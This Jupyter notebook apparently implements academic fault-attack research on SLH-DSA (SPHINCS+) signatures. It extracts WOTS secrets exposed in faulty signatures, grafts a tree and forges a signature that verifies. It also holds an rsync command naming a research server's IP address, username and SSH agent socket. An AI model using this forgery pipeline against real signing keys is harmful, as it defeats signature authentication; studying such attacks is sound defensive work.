# Config

In [None]:
base = "data/"
#base = "../victims/sphincsplus/ref/"
sigs_file_base = "sigs_shake.txt"
keys_file = base + "keys_shake.txt"
sigs_file = base + sigs_file_base
sigs_simulated_file = base + "sigs_simulated.txt"

params = 'SLH-DSA-SHAKE-256s'

sanity_check = True
simulate_faults = False
filter_sigs  = False
use_pickle = True

In [None]:
!SSH_AUTH_SOCK=/tmp/ssh-XXXXXXBjV56o/agent.34496 SSH_AGENT_PID=34497 rsync -avz --progress jb@141.83.162.134:/home/jb/rowhammer-jb/swage/keys_shake.txt jb@141.83.162.134:/home/jb/rowhammer-jb/swage/sigs_shake.txt data/

# Setup

Install dependencies, define some helper functions

In [None]:
%pip install -r requirements.txt
!python --version

In [None]:
from spxplus import ADRS, SLH_DSA, WOTSKeyData

slh = SLH_DSA(params)
a = slh.a
d = slh.d
hp = slh.hp
n = slh.n
k = slh.k
lg_w = slh.lg_w
len1 = slh.len1
len2 = slh.len2
w = slh.w

In [None]:
def print_adrs(adrs: ADRS, end='\n', verbose=False):
    hex = adrs.adrs().hex()
    if verbose:
        print('LAYER' + ' ' * 4 + 
              'TREE ADDR' + ' ' * 18 +
              'TYP' + ' ' * 6 +
              'KADR' + ' ' * 5 +
              'PADD = 0')
    print(' '.join([hex[i:i+8] for i in range(0, len(hex), 8)]), end=' ')
    print(end=end)

In [None]:
# Pickling for compute-intensive data

import os

def pickle_load(filename: str, or_else) -> dict:
    if use_pickle:
        import pickle
        if os.path.exists(filename):
            print(f"Loading pickle from {filename}.")
            with open(filename, 'rb') as f:
                return pickle.load(f)
        else:
            print(f"File {filename} not found, creating new one.")
            return pickle_store(filename, or_else)
    else:
        print(f"Pickle loading is disabled, using fallback.")
        return or_else()
    
def pickle_store(filename: str, fn):
    if use_pickle:
        import pickle
        value = fn()
        with open(filename, 'wb') as f:
            pickle.dump(value, f)
        return value
    else:
        print(f"Pickle storing is disabled, not saving {filename}.")
        value = fn()
        return value

In [None]:
from typing import Generator

def shared_intermediates(v1: WOTSKeyData, valid: WOTSKeyData) -> Generator[tuple[int, int], None, bool]:
    if not v1.intermediates or not valid.intermediates:
        return False
    if v1 == valid:
        return False
    retval = False
    for chain_idx, chain in enumerate(v1.intermediates):
        if not chain:
            continue
        for hash_iter, step in enumerate(chain[1:], start=1):
            if step == valid.sig[chain_idx*n:(chain_idx+1)*n]:
                retval = True
                yield (chain_idx, hash_iter)
    return retval

def print_arr_w(arr: list[int], width):
    print('[ ', end='')
    for x in arr:
        print(f"{x:0{width}d}", end=' ')
    print(']')
    
def valid_sigs_d(groups):
    return {adrs: key for adrs, keys in groups.items() for key in keys if key.valid}

def hex(s: bytes | None) -> str:
    return s.hex() if s else "None"

def print_key_data(v: WOTSKeyData, adrs: ADRS, pk_seed: bytes, valid_key: WOTSKeyData | None = None, indent=''):
    print(indent + ("Valid" if v.valid else "Invalid" if v.valid == False else "--"), end='\t')
    print(indent + v.sig.hex()[:128] + '...')
    print(indent + '\tPK (from tree)\t' + hex(v.pk))
    pk = v.calculate_pk(params, adrs, pk_seed)
    print(indent + '\tPK (calculated)\t' + hex(pk))
    print(indent + f"\tWOTS key is part of signature {v.sig_idx}")
    print(indent + '\t\t\t', end='')
    print_arr_w([i for i in range(len(v.chains))], 2)
    print(indent + '\t' + "chains\t\t", end='')
    print_arr_w(v.chains, 2)
    print(indent + '\t' + "chains (calc)\t", end = '')
    print_arr_w(v.chains_calculated, 2)
    if valid_key and not v.valid:
        for chain_idx, exposed in shared_intermediates(v, valid_key):
            print(indent + f"\t\tExposed {exposed} secret values at chain_idx {chain_idx}")
    

def print_groups(pk_seed: bytes, groups: dict[ADRS, list[WOTSKeyData]], skip_no_exposed=True):
    #collisions: list[tuple[ADRS, set[WOTSKeyData]]] = [(adrs, value) for adrs, value in collisions if any(v.valid for v in value) and not all(v.valid for v in value)]
    #print(f"Found {len(collisions)} groups with at least one valid and one invalid key")
    # collisions where PK match. This is not necessary. Better: find exposed keys by running WOTS chain
    """collisions = [
        (adrs, value)
        for adrs, value in collisions
        if any(v1.msg != v2.msg and v1.pk == v2.pk for v1 in value for v2 in value if v1.valid and not v2.valid)
    ]"""
    
    valid_sigs = valid_sigs_d(groups)

    # sort by layer address
    groups: list = sorted(groups.items(), key=lambda item: item[0].get_layer_address())
    
    for adrs, value in groups:
        valid_sig = valid_sigs[adrs] if adrs in valid_sigs else None
        invalid_sigs = [v for v in value if not v.valid]
        print_adrs(adrs, end='', verbose=True)
        print(len(value))
        
        for v in [valid_sig] + invalid_sigs:
            if not v:
                continue
            if skip_no_exposed and not v.valid and not shared_intermediates(v, valid_sig):
                continue
            print_key_data(v, adrs, pk_seed, valid_sig, indent='\t')

# Clean Start

Run this cell (and below) for a clean analysis

In [None]:
groups: dict[ADRS, set[WOTSKeyData]] = {}

In [None]:
# Load keys
with open(keys_file, "r") as f:
    lines = [s.split(': ') for s in f.readlines()]
    keys = {s[0]: bytes.fromhex(s[1].strip()) for s in lines}
sk = keys['sk']
pk = keys['pk']
pk_seed = pk[:n]
pk.hex()

# Update Experiment
Run this cell (and below) to process new signatures

# Load real signatures

This loads the real signatures from `sigs_file` (see config)

In [None]:
from cryptanalysis_lib import extract_wots_keys


def load_groups():
    with open(sigs_file, "r") as f:
        sigs = [bytes.fromhex(s.strip()) for s in f.readlines()]
        # sigs = sigs[:1000]
    print(f"Processing {len(sigs)} signatures...", end=' ')
    groups = extract_wots_keys(pk, sigs, params)
    return sigs, groups

sigs, groups = pickle_load(sigs_file_base + ".pkl", load_groups)
print(f"Loaded {len(sigs)} signatures in {len(groups)} groups")
total_sigs = sum(len(v) for v in groups.values())
print(f"Total signatures in groups: {total_sigs}")
print(f"valid signatures: {len(set(k.sig_idx for v in groups.values() for k in v if k.valid))}")
print(f"invalid signatures: {len(set(k.sig_idx for v in groups.values() for k in v if not k.valid))}")

# Load simulated faulty signatures
This section loads simulated faults from `sigs_simulated_file`

In [None]:
import os

from cryptanalysis_lib import merge_groups

if simulate_faults:
    with open(sigs_simulated_file, "r") as f:
        faulty_sigs = [bytes.fromhex(s.strip()) for s in f.readlines()]
    print(f"Loaded {len(faulty_sigs)} faulty (simulated) signatures")
    simulated_groups = extract_wots_keys(pk, faulty_sigs)
    for adrs, keys in simulated_groups.items():
        for key in keys:
            key.simulated = True
    #print_groups(pk_seed, simulated_groups)
    groups = merge_groups(groups, simulated_groups)
else:
    print("Fault simulation disabled or no simulated faulty signatures found")

# Tooling sanity check

This section tries to generate a signature using the same key and randomization values as the first signature in `sigs_file`.
We expect them to match. This assumes that the first signature in `sigs_file` is a valid signature.

In [None]:
if sanity_check:
    wots_len = slh.len
    wots_bytes = wots_len * n
    xmss_bytes = hp * n
    fors_bytes = k*(n + a * n)
    sig_len = n + fors_bytes + d * (wots_bytes + xmss_bytes)

    sig = sigs[0]

    m = sig[sig_len:]
    r = sig[:n]
    pysig = slh.slh_sign_internal(m, sk, None, r=r, stop_at=None)
    pysig += m

    if pysig != sig:
        print("Signature mismatch")
        print(pysig.hex())
        print(sig.hex())
    else:
        print("Passed sanity check")
else:
    print("Skipping sanity check")

# Extract WOTS keys

Extract all WOTS keys in all signatures

In [None]:
# Shows distribution of steps in WOTS chains
if False:
    # get distribution of steps in (valid) signatures
    distr = [[0 for _ in range(16)] for _ in range(67)]
    for adrs, keys in groups.items():
        for key in keys:
            if key.valid:
                for chain_idx, chain in enumerate(key.chains):
                        distr[chain_idx][chain] += 1           
    distr

    %pip install matplotlib
    import matplotlib.pyplot as plt

    # distr is your 67×16 list of counts
    # e.g. distr = [[…], …, […]]

    plt.figure(figsize=(8, 10))
    plt.imshow(distr, aspect='auto')        # default colormap
    plt.colorbar(label='Count')              # show scale
    plt.xlabel('Step value (0–15)')
    plt.ylabel('Chain index (0–66)')
    plt.title('Distribution of steps in valid signatures')
    plt.tight_layout()
    plt.show()

# Group Collisions

...appear here!

In [None]:
# sanity check for multiple valid keys
for adrs, keys in groups.items():
    if len([v for v in keys if v.valid]) > 1:
        print("ERROR: found multiple valid keys for the same address", adrs, keys)
        raise ValueError("Multiple valid keys for the same address")

In [None]:
# maintain a dictionary of valid signatures per adrs
valid_sigs = valid_sigs_d(groups)
print(f"Found {len(valid_sigs)} valid signatures in groups")

In [None]:
# only keep keys at target layer
target_layer = 7
groups = {adrs: sigs for adrs, sigs in groups.items() if adrs.get_layer_address() == target_layer}
groups = {adrs: sigs for adrs, sigs in groups.items() if len(sigs) > 0}
print(f"Found {len(groups)} groups at layer {target_layer}")

In [None]:
def max_collisions_by_sig_count(groups: dict[ADRS, set[WOTSKeyData]]):
    max_idx = max((key.sig_idx for adrs, keys in groups.items() for key in keys), default=-1)
    if max_idx < 0:
        return
    for idx in range(0, max_idx, 100):
        count = max(len(set(key.sig for key in keys if key.sig_idx < idx)) for keys in groups.values())
        yield (idx, count)

In [None]:
for c in max_collisions_by_sig_count(groups):
    print(f'{c[0]},{c[1]}')

In [None]:
# only keep collisions
from cryptanalysis_lib import find_collisions


groups = find_collisions(groups)
print(f"Found {len(groups)} groups with collisions")

In [None]:
# post-process collided WOTS keys
def calc_intermediates() -> dict[ADRS, set[WOTSKeyData]]:
    global groups
    for adrs, keys in groups.items():
        if adrs not in valid_sigs:
            continue
        valid_sig = valid_sigs[adrs]
        for key in keys:
            key.calculate_intermediates(params, adrs, pk_seed, valid_sig)
    return groups
        
groups: dict[ADRS, set[WOTSKeyData]] = pickle_load("groups_intermediates_" + sigs_file_base + ".pkl", calc_intermediates)
print(f"Calculated intermediates for {len(groups)} groups")
assert all(s.chains_calculated for _, sigs in groups.items() for s in sigs), "Not all keys have calculated chains"

In [None]:
# filter out signatures containing no WOTS secrets
groups = {adrs: [sig for sig in sigs if any(i < 17 for i in sig.chains_calculated)] for adrs, sigs in groups.items()}
groups = find_collisions(groups)
print(f"Found {len(groups)} groups with at least one WOTS secret")

In [None]:
def filter_signatures(sigs: list[bytes], wots_keys: dict[ADRS, set[WOTSKeyData]]) -> set[bytes]:
    filtered_sigs = set()
    collisions = find_collisions(wots_keys)
    collisions = {adrs: sigs for adrs, sigs in collisions.items() if any(sig.valid for sig in sigs) and len(sigs) > 1}
    valid_sigs = valid_sigs_d(wots_keys)
    for adrs, keys in collisions.items():
        for key in keys:
            if key.valid:
                # keep valid keys
                filtered_sigs.add(sigs[key.sig_idx])
            if adrs in valid_sigs and shared_intermediates(key, valid_sigs[adrs]):
                filtered_sigs.add(sigs[key.sig_idx])
    return filtered_sigs

if filter_sigs:
    # only keep signatures that are valid or have exposed WOTS keys
    filtered_sigs = filter_signatures(sigs, groups)
    print(f"Kept {len(filtered_sigs)} of {len(sigs)} signatures")
    with open("../sigs_filtered.txt", "w") as f:
        for sig in filtered_sigs:
            f.write(sig.hex() + "\n")

# Combine WOTS Keys
This section combines the collided keys

In [None]:
# filter groups with exposed WOTS secrets
groups: dict[ADRS, set[WOTSKeyData]] = {adrs: sigs 
    for adrs, sigs in groups.items()
    if any(not sig.valid and shared_intermediates(sig, valid_sigs[adrs]) for sig in sigs)
}
print(f"Found {len(groups)} groups with exposed WOTS secrets")
#print_groups(pk_seed, groups)

In [None]:
# Join WOTS keys to get a WOTS key usable for signing as many messages as possible
from copy import deepcopy

def join_sigs(wots_keys: dict[ADRS, set[WOTSKeyData]], params, pk_seed) -> dict[ADRS, WOTSKeyData]:
    joined_sigs = {}
    valid_sigs = valid_sigs_d(wots_keys)
    for adrs, keys in wots_keys.items():
        if len(keys) < 2:
            continue
        retval = deepcopy(valid_sigs[adrs])
        if not retval.chains_calculated:
            print_adrs(adrs)
            retval.calculate_intermediates(params, adrs, pk_seed, valid_sigs[adrs])
        for key in keys:
            retval = retval.join(key, params)
        joined_sigs[adrs] = retval
    return joined_sigs

joined_sigs = join_sigs(groups, params, pk_seed)
print(f"Joined {len(joined_sigs)} signatures")
# Filter out signatures with all chains set to 0
#joined_sigs = {adrs: key for adrs, key in joined_sigs.items() if any(c > 0 for c in key.chains_calculated)}
#print(f"Filtered {len(joined_sigs)} (wildcard chains)")

In [None]:
def score(key: WOTSKeyData) -> int:
    from cryptanalysis_worker import signable_messages
    msg_chains = key.chains_calculated[:slh.len1]
    cksum_chains = key.chains_calculated[slh.len1:]
    signable = signable_messages(msg_chains, cksum_chains, w, len1, len2)
    return sum(i for (_, i) in signable)

In [None]:
import math


for adrs, key in sorted(joined_sigs.items(), key=lambda item: score(item[1]), reverse=True):
    print_adrs(adrs, verbose=True)
    print("Score: ", math.log2(score(key)) - math.log2(w**len1))
    print_key_data(key, adrs, pk_seed, None)

    print("=" * 64)
    print("All keys for exposed address:")
    print_adrs(adrs, verbose=True)
    for key in groups[adrs]:
        print_key_data(key, adrs, pk_seed, valid_sigs[adrs])


In [None]:
# calculate number of signinable messages (without checksum)
import math

def num_signable_messages(key: WOTSKeyData) -> int:
    return score(key)
tmp = [(a, k) for a, k in joined_sigs.items()]
num_signable = [num_signable_messages(k) for _, k in tmp]
expected_reps = [(w**len1)/n for n in num_signable]

# take the best key in the set
most_exposed_adrs, most_exposed_key = tmp[num_signable.index(max(num_signable))]
expected_reps_best = min(expected_reps)

print([math.log2(r) for r in expected_reps])

In [None]:
# sign a random message with the exposed key
#msg = bytes.fromhex('bc9c6c7892ac9aa558a7ee5ef40a50bed3796a3cc657e88c6cedec7ddffbdad2')
#assert most_exposed_key.try_sign(msg, most_exposed_adrs, pk_seed, params)

# Tree Grafting

It gets costly from here on. Tread lightly

In [None]:
import cryptanalysis_lib as clib

In [None]:
%timeit clib.sign_worker((1, most_exposed_adrs, most_exposed_key, pk_seed, params))

In [None]:
#%timeit clib.sign_worker_xmss((1, most_exposed_adrs, most_exposed_key, pk_seed, params))
#%timeit clib.treehash_c_shake_256s()

In [None]:
#%timeit clib.sign_worker_xmss_c((1, most_exposed_adrs, most_exposed_key, pk_seed, params))
#%timeit clib.treehash_c_sha2_256s()

In [None]:
import math
from multiprocessing import Pool
from os import cpu_count

import concurrent

def sign_message_batch_mp(total_msgs, adrs, key, pk_seed, params, num_procs: int = 0):
    """
    Use a process pool to sign `total_msgs` messages *per* (adrs,key).
    Returns the first successful message signed by any process.
    """
    if num_procs == 0:
        num_procs = cpu_count() or 1

    # Split total_msgs into roughly equal chunks per process
    per_proc = math.ceil(total_msgs / num_procs)
    print("Total messages per process:", per_proc)

    # Build one work item per (process x key)
    work = [(per_proc, adrs.copy(), key, pk_seed, params) for _ in range(num_procs)]
    
    with concurrent.futures.ProcessPoolExecutor() as executor:
        futures = {executor.submit(clib.sign_worker, work): work for work in work}
        
        for future in concurrent.futures.as_completed(futures):
            try:
                result = future.result()
                if result:
                    # Cancel all other futures
                    for f in futures:
                        f.cancel()
                    return result
            except Exception as e:
                print("Error:", e)
    return None

print(f"Expected repetitions 2^{math.log2(expected_reps_best)}")
if expected_reps_best > 2**37:
    raise ValueError(f"Expected repetitions 2^{math.log2(expected_reps_best)} are too high, aborting")
num_sigs = expected_reps_best * 2

print(f"Signing {num_sigs} messages")
ret = sign_message_batch_mp(num_sigs, most_exposed_adrs, most_exposed_key, pk_seed, params, num_procs=cpu_count()-1)
if not ret:
    raise ValueError("No valid signature found")
xmss_pk, adrs, sk_seed, key = ret
print("Successfully grafted tree for XMSS PK " + xmss_pk.hex())
print("Address")
print_adrs(adrs, verbose=True)
print("SK seed:", sk_seed.hex())
print("PK seed:", pk_seed.hex())
print("Key:", key)

In [None]:
def forge(valid_sig: bytes, sk: bytes, pk: bytes, adrs: ADRS, key: WOTSKeyData, m: bytes, params: str):
    slh = SLH_DSA(params)
    pk_seed = pk[:slh.n]
    pk_root = pk[slh.n:]
    top_part = valid_sig[n + fors_bytes + (d-1) * (wots_bytes + xmss_bytes) + wots_bytes:n + fors_bytes + d * (wots_bytes + xmss_bytes)]
    forged_sig = None
    # find a randomization value R that matches the adrs of the exposed key
    addrnd = None
    while not addrnd:
        addrnd = os.urandom(32)
        digest  = slh.h_msg(addrnd, pk_seed, pk_root, m)
        (_, i_tree, i_leaf) = slh.split_digest(digest)
        hp_m    = ((1 << slh.hp) - 1)
        for i in range(1, target_layer-1):
            i_leaf = i_tree & hp_m  # i_leaf = i_tree mod 2^h'
            i_tree  =   i_tree >> slh.hp  # i_tree >> h'
        if i_leaf != adrs.get_layer_address():
            #print(f"Leaf index {i_leaf} in layer {target_layer} does not match target index {adrs.get_key_pair_address()}, retrying...")
            addrnd = None
            continue
    while not forged_sig:
        bottom_part, root = slh.slh_sign_internal(m, sk, addrnd, stop_at=target_layer-1)
        pk_seed = pk[:slh.n]
        forged_sig = key.try_sign(root, adrs, pk_seed, params)
    print(len(bottom_part))
    print(len(forged_sig))
    print(len(top_part))
    return bottom_part + forged_sig + top_part

sk_prf = os.urandom(32)
_, sk = slh.slh_keygen_internal(sk_seed, sk_prf, pk_seed, params)
valid_sig = next(key for key in groups[most_exposed_adrs] if key.valid)

wots_bytes = slh.len * n
xmss_bytes = hp * n
fors_bytes = k * (n + a * n)
sig_len = n + fors_bytes + d * (wots_bytes + xmss_bytes)
valid_sig = sigs[valid_sig.sig_idx]
m = valid_sig[sig_len:]
valid_sig = valid_sig[:sig_len]

print(f'verifying message "{m.decode()}" with valid signature')
suc = slh.slh_verify_internal(m, valid_sig, pk, params)
print("Signature verification result:", suc)

print(f'Signining message "{m.decode()}" with compromised key')
sig = forge(valid_sig, sk, pk, most_exposed_adrs, most_exposed_key, m, params)
print(f'verifying message "{m.decode()}" with forged signature')
suc = slh.slh_verify_internal(m, sig, pk, params)
print("Signature verification result:", suc)